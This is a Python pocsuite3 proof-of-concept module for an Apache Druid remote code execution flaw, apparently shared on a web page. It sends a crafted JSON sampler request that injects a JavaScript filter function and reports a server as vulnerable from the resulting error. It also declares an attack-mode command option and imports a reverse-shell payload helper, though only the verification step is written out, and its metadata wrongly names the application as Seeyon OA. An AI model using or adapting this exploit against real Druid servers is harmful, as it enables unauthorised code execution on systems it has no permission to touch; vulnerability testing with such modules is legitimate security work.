import base64
import json
from collections import OrderedDict
from urllib.parse import urljoin
from pocsuite3.api import Output, POCBase, register_poc, logger, requests, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str
from pocsuite3.modules.listener import REVERSE_PAYLOAD
class DemoPOC(POCBase):
vulID = '99119' # ssvid
version = '3.0'
author = ['']
vulDate = '2021-2-02'
createDate = '2021-2-02'
updateDate = '2021-2-02'
references = ['']
name = 'Apache Druid RCE'
appPowerLink = ''
appName = 'Seeyon OA'
appVersion = ''
vulType = 'RCE'
desc = '''
Apache Druid RCE漏洞
'''
samples = []
install_requires = ['']
def _options(self):
o = OrderedDict()
o["command"] = OptString('whoami', description='attack模式可以指定执行的命令')
return o
def check(self, payload, flag):
headers = {'Accept': 'application/json, text/plain, */*', 'Referer': self.url,
'Content-Type': 'application/json;charset=UTF-8'}
url = urljoin(self.url, '/druid/indexer/v1/sampler?for=filter')
data = '''{"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{\\"isRobot\\":true,\\"channel\\":\\"#sv.wikipedia\\",\\"timestamp\\":\\"2016-06-27T00:00:11.080Z\\"}"},"inputFormat":{"type":"json","keepNullColumns":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","format":"iso"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"%s","dimension":"added","value":"",
"":{"enabled":"true"}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}''' % payload
resp = requests.post(url, data=data, headers=headers)
if flag in resp.text:
return resp.text
def _verify(self):
result = {}
try:
payload = 'function(value){'
if self.check(payload, 'org.mozilla.javascript.EvaluatorException'):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.exception(e)
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
暂无评论